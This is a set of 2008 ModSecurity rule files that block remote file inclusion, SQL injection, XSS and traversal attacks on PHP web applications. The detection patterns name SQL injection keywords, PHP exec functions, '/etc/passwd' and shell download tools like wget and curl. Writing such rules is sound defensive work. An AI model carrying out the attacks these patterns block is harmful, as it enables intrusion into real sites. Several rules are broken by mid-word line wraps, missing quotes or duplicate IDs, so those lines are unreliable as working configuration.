SecFilterSelective REQUEST_URI "/orderSuccess\.inc\.php\?" "chain,rev:1,id:HG2007071820,deny,severity:5,msg:'CVE-2004-1580: CubeCart RFI'"
SecFilterSelective REQUEST_URI "&glob\[rootDir\]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/orderSuccess\.inc\.php\?" "chain,rev:1,id:HG2007071821,deny,severity:5,msg:'CVE-2006-4525/6/7: CubeCart RFI'"
SecFilterSelective REQUEST_URI "oid=" "chain"
SecFilterSelective REQUEST_URI "(SELECT|FROM|WHERE|ORDER BY|LIMIT|JOIN|SELECT|DROP|UNION|SUBSTRING|admin_users)"
SecFilterSelective REQUEST_URI "(/admin/header\.inc\.php|/admin/footer\.inc\.php)\?" "chain,rev:1,id:HG2007071822,deny,severity:5,msg:'CVE-2006-5107: CubeCart RFI'"
SecFilterSelective REQUEST_URI "(la_adm_header|la_pow_by|site_name)=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/core\.php|/modules/index_table\.php|/modules/addedit\.php|/modules/view\.php|/modules/vw_files\.php|/modules/viewgantt\.php)\?" "chain,rev:1,id:HG2007071901,deny,severity:5,msg:'SA7961: RFI: dotProject'"
SecFilterSelective REQUEST_URI "root_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/classes/query\.class\.php|/includes/db_adodb\.php|/includes/db_connect\.php|/includes/session\.php|/modules/admin/vw_usr_roles\.php|/modules/public/calendar\.php|/modules/public/date_format\.php)\?" "chain,rev:1,id:HG2007071902,deny,severity:5,msg:'CVE-2006-0754: dotProject RFI'"
SecFilterSelective REQUEST_URI "baseDir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/modules/projects/gantt\.php|/modules/projects/vw_files\.php|/modules/projects/gantt2\.php)\?" "chain,rev:1,id:HG2007071903,deny,severity:5,msg:'CVE-2006-0754: dotProject RFI'"
SecFilterSelective REQUEST_URI "dPconfig\[root_dir\]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(/docs/phpinfo\.php|/docs/check\.php)" "rev:1,id:HG2007071904,deny,severity:5,msg:'CVE-2006-5107: dotProject info disclosure'"
SecFilterSelective ARG_mosConfig_live_site "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101701,deny,severity:5,msg:'Joomla: Reg Globals mosConfig_live_site RFI'"
SecFilterSelective ARG_mosConfig_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101702,deny,severity:5,msg:'Joomla: Reg Globals mosConfig_absolute_path RFI'"
SecFilterSelective REQUEST_URI "/components/com_restaurante/img_original/\..*" "rev:1,id:HG2007101710,deny,severity:5,msg:'RFI: Joomla Restaurante Upload'"
SecFilterSelective REQUEST_URI "/components/com_content/models/(archive|category|section)\.php" "chain,rev:1,id:HG2007101711,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective ARGS "(UNION|SELECT|password|username|FROM|concat|jos_users)"
SecFilterSelective REQUEST_URI "index\.php\?" "chain,rev:1,id:HG2007101712,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective REQUEST_URI "option=com_(eventlist|ezine|frontpage|gmaps|jombib|neorecruit|nicetalk|philaform|ponygallery|resman|rwcards|search)" chain
SecFilterSelective REQUEST_URI "(concat|jos_users|password|select|union|username|usertype)"
SecFilterSelective REQUEST_URI "index\.php\?option=com_rsfiles" "chain,rev:1,id:HG2007101714,deny,severity:5,msg:'RFI: Joomla RSFiles DL'"
SecFilterSelective REQUEST_URI "path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/libraries/pcl/pcltar\.php\?" "chain,rev:1,id:HG2007101720,deny,severity:5,msg:'RFI: Joomla 1.5'"
SecFilterSelective REQUEST_URI "g_pcltar_lib_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/com_articles\.php\?" "chain,rev:1,id:HG2007101723,deny,severity:5,msg:'RFI: Joomla Article 1.1'"
SecFilterSelective REQUEST_URI "absolute_path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_joomlaboard/file_upload\.php\?" "chain,rev:1,id:HG2007101731,deny,severity:5,msg:'RFI: Joomla Joomlaboard 1.1.1'"
SecFilterSelective REQUEST_URI "sbp=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_webring/admin\.webring\.docs\.php\?" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'RFI: Joomla WebRing'"
SecFilterSelective REQUEST_URI "component_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/index2\.php\?option=com_rss" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'DOS: Joomla 1.0.7'"
SecFilterSelective REQUEST_URI "feed=test\\\/>"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-formtools.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/global/templates/(admin_page_open\.php\?|/client_page_open\.php\?) chain,id:HG2007121601,deny,msg:'RFI: Form Tools'"
SecFilterSelective ARG_g_root_dir "(\.\./\.\.|'|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-horde.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "go\.php\?.*(http|ftp)" "id:HG2008011001,rev:1,severity:2,msg:'Horde: go.php exploit'"
SecFilterSelective REQUEST_URI "!(horde/services/go\.php)" "chain,id:390144,rev:1,severity:2,msg:'Rootkit attack: Generic Attempt to install rootkit'"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "!(horde/services/go\.php)" "chain,id:390145,rev:1,severity:2,msg:'Rootkit attack: Generic Attempt to install rootkit'"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\?"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-invisionpowerboard.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/ad_member\.php\?" "chain,rev:1,id:HG2007102005,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilter "emailer\.php"
SecFilterSelective REQUEST_URI "/ipchat\.php\?" "chain,rev:1,id:HG2007102006,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilterSelective ARG_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?act=" "chain,rev:1,id:HG2007102007,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilterSelective ARG_st "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|re
name|describe|union)"
SecFilterSelective REQUEST_URI "/ipchat\.php\?" chain
SecFilter "conf_global\.php"
SecFilterSelective REQUEST_URI "/index\.php\?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT|DROP|CONCAT|TRUNCATE)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007102007,deny,severity:5,msg:'InvisionPB Exploit'"
SecFilterSelective "ARG_comment|ARG_mid" "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|re
name|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)" "
SecFilterSelective REQUEST_URI "/index\.php\?act=Login&CODE=autologin" chain
SecFilterSelective REQUEST_URI "((select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|r
ename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view)|user\+AND\+MID\(password)"
SecFilterSelective REQUEST_URI "index\.php\?" chain
SecFilterSelective ARG_st "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rena
me|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*INTO.*FROM)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007072025,deny:503,severity:5,msg:'HG: Invision RFI'"
SecFilterSelective ARG_showuser "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-joomla.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin_settings\.php\?" "chain,rev:1,id:HG2007120901,deny,severity:5,msg:'RFI: Joomla ARG: CONFIG_EXT[ADMIN_PATH]'"
SecFilterSelective "ARG_CONFIG_EXT[ADMIN_PATH]" "(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007111515,deny,severity:5,msg:'RFI: Mambo ARG: options'"
SecFilterSelective ARG_option "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective ARG_ff_compath "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007111501,deny,severity:5,msg:'Joomla: ff_compath RFI'"
SecFilterSelective REQUEST_URI "/(.+\.php)\.{1,4}" "rev:1,id:HG2007101746,deny,severity:5,msg:'PHP: Double File Extensions'"
SecFilterSelective REQUEST_URI "index\.php\?" "chain,rev:1,id:HG_SQL_JOOMLA01,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective REQUEST_URI "option=com_(eventlist|ezine|frontpage|gmaps|jombib|mambads|neorecruit|nicet
alk|philaform|ponygallery|resman|remository|rwcards|search)" chain
SecFilterSelective REQUEST_URI "(select|union|username)[[:space:]]|(concat|jos_users|mos_users|password|sel
ect|union|username|usertype)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]"
SecFilterSelective ARG_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA01,deny,severity:5,msg:'Generic absolute_path RFI'"
SecFilterSelective ARG_mosConfig_live_site "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA02,deny,severity:5,msg:'Generic mosConfig_live_site RFI'"
SecFilterSelective ARG_mosConfig_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA03,deny,severity:5,msg:'Generic mosConfig_absolute_path RFI'"
SecFilterSelective ARG_GlobalSettings[templatesDirectory] "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_JOOMLA04,deny,severity:5,msg:'Generic GlobalSettings RFI'"
SecFilterSelective REQUEST_URI "/(.+\.php)\.{1,4}$"
SecFilterSelective REQUEST_URI "/components/com_content/models/(archive|category|section)\.php" "chain,rev:1,id:HG2007101711,deny,severity:5,msg:'RFI: Joomla SQL'"
SecFilterSelective ARGS "(union|select|password|username|from|concat|jos_users|mos_users|passwd|user
s)"
SecFilterSelective REQUEST_URI "index\.php\?option=com_rsfiles" "chain,rev:1,id:HG2007101714,deny,severity:5,msg:'RFI: Joomla RSFiles DL'"
SecFilterSelective REQUEST_URI "path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_cropimage/admin\.cropcanvas\.php?" "chain,rev:1,id:HG2007101734,deny,severity:5,msg:'RFI: Mambo CropImage 1.0'"
SecFilterSelective REQUEST_URI "cropimagedir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_mambowiki/MamboLogin\.php\?" "chain,rev:1,id:HG2007101735,deny,severity:5,msg:'RFI: Mambo MamboWiki 0.9.6'"
SecFilterSelective REQUEST_URI "IP=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_mospray/scripts/admin\.php\?" "chain,rev:1,id:HG2007101736,deny,severity:5,msg:'RFI: Mambo MoSpray 18RC1'"
SecFilterSelective REQUEST_URI "basedir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_extcalendar/admin_events\.php\?" "rev:1,id:HG2007101738,deny,severity:5,msg:'RFI: Mambo ExtCalendar'"
SecFilterSelective REQUEST_URI "CONFIG_EXT[LANGUAGES_DIR]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_forum/download\.php\?" "rev:1,id:HG2007101739,deny,severity:5,msg:'RFI: Mambo phpBB'"
SecFilterSelective REQUEST_URI "phpbb_root_path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_simpleboard/image_upload\.php\?" "rev:1,id:HG2007101740,deny,severity:5,msg:'RFI: Mambo SimpleBoard'"
SecFilterSelective REQUEST_URI "sbp=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/includes/functions_cms\.php\?" "chain,rev:1,id:HG2007101741,deny,severity:5,msg:'RFI: Mambo phpBB'"
SecFilterSelective REQUEST_URI "phpbb_root_path=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/libraries/pcl/pcltar\.php\?" "chain,rev:1,id:HG2007101720,deny,severity:5,msg:'RFI: Joomla 1.5'"
SecFilterSelective REQUEST_URI "g_pcltar_lib_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_joomlaboard/file_upload\.php\?" "chain,rev:1,id:HG2007101731,deny,severity:5,msg:'RFI: Joomla Joomlaboard 1.1.1'"
SecFilterSelective REQUEST_URI "sbp=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/components/com_flyspray/startdown\.php\?" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'Mambo FlySpray Info Leak'
SecFilterSelective REQUEST_URI "(file=config\.inc\.php|/etc/passwd)"
SecFilterSelective REQUEST_URI "/components/com_webring/admin\.webring\.docs\.php\?" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'RFI: Joomla WebRing'"
SecFilterSelective REQUEST_URI "component_dir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/index2\.php\?option=com_rss" "chain,rev:1,id:HG2007101732,deny,severity:5,msg:'DOS: Joomla 1.0.7'"
SecFilterSelective REQUEST_URI "feed=test\\\/>"
SecFilterSelective REQUEST_URI "/components/com_content/content\.php\?" "chain,rev:1,id:HG2007101744,deny,severity:5,msg:'RFI: Mambo PW Hash'"
SecFilterSelective ARGS "rating_sum" chain
SecFilterSelective ARGS "(concat|jos_users|mos_users|password|select|union|username|usertype)"
SecFilterSelective REQUEST_URI "/index\.php\?option=com_content" "chain,rev:1,id:HG2007101745,deny,severity:5,msg:'RFI: Mambo PW Hash'"
SecFilterSelective ARGS "(concat|jos_users|mos_users|password|select|union|username|usertype)"
SecFilterSelective REQUEST_URI "/index\.php\?option=com_content&task=vote&id=.*&Itemid=.*&cid=.*&user_rating=.*\((select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|r
ename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+(from|into|table|database|index|view)"
SecFilterSelective REQUEST_URI "/content\.php" chain
SecFilterSelective ARG_user_rating ".*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|
rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view)"
SecFilterSelective ARG_mosConfig_absolute_path "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index(2?)\.php\?.*mosConfig_absolute_path=(http|https|ftp)\:\/"
SecFilterSelective REQUEST_URI "/emailfriend/(emailarticle|emailfaq|emailnews)\.php\?id=\"(\<script|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-jportal.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/jportal/banner\.php" chain
SecFilterSelective REQUEST_URI "(UNION|SELECT|DELETE|INSERT)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-modernbill.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/samples/news\.php\?DIR=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "/order/orderwiz\.php\?" "chain,rev:1,log,deny,msg:'ModernBill RFI'"
SecFilterSelective ARG_aid "(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-moodle.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "(/iplookup/ipatlas/plot|/course/category)\.php\?" "chain,rev:1,id:HG_SQL_MOODLE01,deny,severity:5,msg:'Moodle SQL'"
SecFilterSelective ARGS "(mdl_course|mdl_user|into dumpfile|union select)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-movabletype.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/skel\.php\?" "chain,rev:1,id:HG2007122801,deny:503,severity:5,msg:'HG: RFI: MovableType'"
SecFilterSelective ARG_page "(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-myspaceresource.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_rootBase "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007110501,deny,severity:5,msg:'MySpace Resource RFI'"
SecFilterSelective REQUEST_URI "/index\.php\?pg=forums" "chain,rev:1,id:HG2007111605,deny,severity:5,msg:'MySpace Clone SQLi'"
SecFilterSelective REQUEST_URI "union|\*\*|from.*admin"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-noahsclassifieds.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/classifieds/index\.php\?" "chain,rev:1,id:HG2007101830,deny,severity:5,msg:'Noah Classifieds SQL'"
SecFilterSelective REQUEST_URI "(union |select |classifieds_classifiedsuser|drop |insert into)"
SecFilterSelective REQUEST_URI "/classifieds/index\.php\?" "chain,rev:1,id:HG2007101830,deny,severity:5,msg:'Noah Classifieds SQL'"
SecFilterSelective ARG_otherTemplate "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-nucleus.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/nucleus/libs/PLUGINADMIN\.php\?" "chain,rev:1,id:HG2007101832,deny,severity:5,msg:'Noah Classifieds SQL'"
SecFilterSelective REQUEST_URI "GLOBALS[DIR_LIBS]=(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-open-realty.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-oscommerce.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/extras/update\.php\?" "chain,rev:1,id:HG2007101841,deny,severity:5,msg:'osCommerce RFI'"
SecFilterSelective ARG_readme_file "(\.\./\.\.|\.\./catalog/|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/default\.php\?" chain
SecFilterSelective "ARG_error_message|ARG_info_message" "((javascript|script|about|applet|activex|chrome)*>|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/default\.php\?(error_message|info_message)=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/product_info\.php" chain
SecFilterSelective ARG_products_id "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|renam
e|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]"
SecFilterSelective REQUEST_URI "/product_info\.php\?" "chain,rev:1,id:HG200711181001,deny,severity:5,msg:'osCommerce RFI'
SecFilterSelective ARG_products_id "(\.\./\.\.|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-osticket.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(include/main\.php|view\.php)\?" "chain,rev:1,id:HG2007101833,deny,severity:5,msg:'osTicket RFI'"
SecFilterSelective "ARG_inc|ARG_include_dir" "(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/view\.php\?" "chain,rev:1,id:HG2007101833,deny,severity:5,msg:'osTicket SQL'"
SecFilterSelective REQUEST_URI "(concat|union select|password|username|ticket_messages)"
SecFilterSelective REQUEST_URI "/(attachments|module)\.php\?" "chain,rev:1,id:HG2007101834,deny,severity:5,msg:'osTicket RFI'"
SecFilterSelective REQUEST_URI "file=(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/include/(admin_login|header|open_submit|user_login)\.php\?" "chain,rev:1,id:HG2007101834,deny,severity:5,msg:'osTicket SQL'"
SecFilterSelective REQUEST_URI "(concat|union select|password|username|ticket_messages)"
SecFilterSelective REQUEST_URI "/(admin|include/main|view)\.php\?" "chain,rev:1,id:HG2007101910,deny,severity:5,msg:'osTicket SQL'"
SecFilterSelective "ARG_t|ARG_cat" "(concat|drop|select|password|username|union|ticket_messages|truncate)"
SecFilterSelective ARG_inc "(\.\./\.\.|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-perldesk.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/kb\.cgi\?" "chain,rev:1,id:HG2007101840,deny,severity:5,msg:'osTicket RFI'"
SecFilterSelective REQUEST_URI "(union select|password|username|from users)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpadsnew.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_phpAds_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101860,deny,severity:5,msg:'phpAdsNew RFI'"
SecFilterSelective REQUEST_URI "/libraries/lib-xmlrpcs.inc\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-activation\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-cleantables\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-autotargeting\.php"
SecFilterSelective REQUEST_URI "/maintenance/maintenance-reports\.php"
SecFilterSelective REQUEST_URI "/misc/backwards\x20compatibility/phpads\.php"
SecFilterSelective REQUEST_URI "/misc/backwards\x20compatibility/remotehtmlview\.php"
SecFilterSelective REQUEST_URI "/misc/backwards\x20compatibility/click\.php"
SecFilterSelective REQUEST_URI "/adframe\.php\?refresh=(.+)\'\>"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpauction.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpbb.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_phpbb_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101861,deny,severity:5,msg:'phpBB phpbb_root_path RFI'"
SecFilterSelective REQUEST_URI "/bbcodeSource\.php\?" "chain,rev:1,id:HG2007111603,deny,severity:5,msg:'phpBB bbCode RFI'"
SecFilterSelective ARG_example "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?module=PNphpBB2" "chain,rev:1,id:HG2007101870,deny,severity:5,msg:'phpBB SQL'"
SecFilterSelective REQUEST_URI "(user_password|from.+phpbb_users|union|where.+user_id|user_password)"
SecFilterSelective REQUEST_URI "/admin/admin_acronyms\.php\?" "chain,rev:1,id:HG2007101862,deny,severity:5,msg:'phpBB SQL'"
SecFilterSelective REQUEST_URI "(user_password|from.+phpbb_users|union|user_password|where.+user_id)"
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
SecFilterSelective ARG_highlight "(x27|%27|x2527|%2527|'\.mysql_query\(|system\()"
SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc
_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_term
inate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)(([
0-9a-fA-Fx]{1,3}))"
SecFilterSelective REQUEST_URI "admin/admin_styles\.php\?" chain
SecFilterSelective ARG_install_to "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/downloads\.php\?" chain
SecFilterSelective REQUEST_URI "(UNION|SELECT|DELETE|INSERT)*user_password.*phpbb_users"
SecFilterSelective REQUEST_URI "/cal_view_month\.php\?" chain
SecFilterSelective REQUEST_URI "(UNION|SELECT|DELETE|INSERT)"
SecFilterSelective REQUEST_URI "/links\.php\?" chain
SecFilterSelective ARG_id "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/dlman\.php\?"
SecFilterSelective ARG_file_id "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective ARG_sid "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?(c|mark)=*'"
SecFilterSelective REQUEST_URI "/portal\.php\?" chain
SecFilterSelective ARG_article "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/album_search\.php\?" chain
SecFilterSelective ARG_mode "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/moddb/mod\.php\?" chain
SecFilterSelective ARG_id "(\.\./\.\.|'|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/auction_rating\.php\?mode=.*&u=.*'"
SecFilterSelective REQUEST_URI "/auction_offer\.php\?mode=.*&ar=.*'"
SecFilterSelective REQUEST_URI "/profile\.php\?mode=viewprofile&u=.*((javascript|script|about|applet|activex|chrome)*>|html|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/viewtopic\.php\?*" chain
SecFilterSelective ARG_highlight "((javascript|script|about|applet|activex|chrome)*>|html|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/posting_notes\.php\?mode=editpost" chain
SecFilterSelective REQUEST_URI "(delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe
|select|union)[[:space:]]+[A-Z|a-z|0-9|*| ]+[[:space:]](from|into|table|database|index|view|select)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpclassifieds.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_path_escape "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2008012401,deny,severity:5,msg:'phpClassifieds RFI'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpcoin.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(api|common|constants|core|custom|db|redirect|session_set)\.php\?" "chain,rev:1,id:HG2007101890,deny,severity:5,msg:'phpCoin RFI'"
SecFilterSelective "ARG__CCFG[_PKG_PATH_INCL]" "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpesp.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpformgenerator.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phplist.conf: 2008-04-02 17:01:45.000000000 -0500: jshanley@

SecFilterSelective "ARG_GLOBALS[database_module]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101870,deny,severity:5,msg:'phpList RFI'"
SecFilterSelective "ARG_GLOBALS[language_module]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007102201,deny,severity:5,msg:'phpList RFI'"
SecFilterSelective REQUEST_URI "/(addsite|config|editsite|in)\.php\?" "chain,rev:1,id:HG2008040101,msg:'phpList RFI'"
SecFilterSelective ARG_returnpath "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/lists/admin/\?page=admin&id=*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create
|rename|describe)[[:space:]]+[A-Z|a-z|0-9|*| |,]+[[:space:]](from|into|table|database|index|view)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phplive.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/phplive/help\.php\?" "chain,rev:1,id:HG2007111812,deny,severity:5,msg:'phpLive RFI'"
SecFilterSelective ARG_css_path "(\.\./\.\.|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpmyadmin.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/calendar\.php\?calbirthdays=.*&action=.*&day=.*&comma=*(cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|lwp-(download|request|mirror|rget)|id|uname|cvs|svn|(r|s)sh|(s|r)cp|rexec|smbclient|
t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"
SecFilterSelective SCRIPT_FILENAME "export\.php$" chain
SecFilterSelective ARG_what "\.\."
SecFilterSelective REQUEST_URI "/css/phpmyadmin\.css\.php\?GLOBALS\[cfg\]\[ThemePath\]=/etc"
